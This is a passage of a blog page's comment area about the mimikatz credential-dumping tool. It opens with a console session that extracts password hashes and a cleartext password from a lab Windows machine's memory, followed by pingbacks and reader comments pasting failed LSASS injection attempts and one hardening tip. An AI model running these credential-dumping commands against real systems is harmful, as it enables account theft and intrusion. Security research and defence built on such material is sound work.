mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar
Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows
Hints are as follows:
Demande d’ACTIVATION du privilege: SeDebugPriviliege:OK
Erreur:Impossible d’injecter !; 拒绝访问
Erreur:pas ou plus de communication etablie
How so? thank
win7 sp1 administrator run it
mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 580
Erreur : Impossible d’injecter ! ; (0x00000005) 拒绝访问。
mimikatz # @getLogonPasswords
Erreur : pas ou plus de communication établie
Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily
Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS
Ping : Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo) | Thangletoan’s Weblog
Ping : 神器mimikatz | 冰锋刺客
Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Startend.Blog's
Ping : 神器mimikatz | 潇湘博客
Ping : mimikatz - 网站安全,服务器安全,防御检测
Ping : Password Cracking « Aggressive Virus Defense
Ping : Windows 8 Clear Text Passwords from Locked Desktop with Mimikatz « CYBER ARMS – Computer Security
Ping : Saber la pass del ADMIN « 3lhacker – Comunidad Informatica
Ping : Jak na export privatniho klice certifikatu, kdyz je oznacen jako non-exportable | logon
Ping : 直接爆WIN2003+服务器的管理员密码的Mimikatz软件 | 紫云残雪's Blog
Ping : Hacking Windows with Password Grabbing | ColeSec Security
Ping : Obtener contraseña de administrador de Windows desde el propio Windows | DURKH3IM'S BLOG
Ping : mimikatz-en (English Translation of Mimikatz) Release « AttackVector.org
Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀Win系 – 思安阁
Ping : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz | Yoann's Workshop
Ping : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1 | clymb3r
Ping : [Sécurité] Mimikatz | aurelienantonoff
secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
Remove Administrators/System
This is also how you stop Pass-The-hash from working too.
I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 640
Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
Same wtih Win7(64-bit) only the hex is different
Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.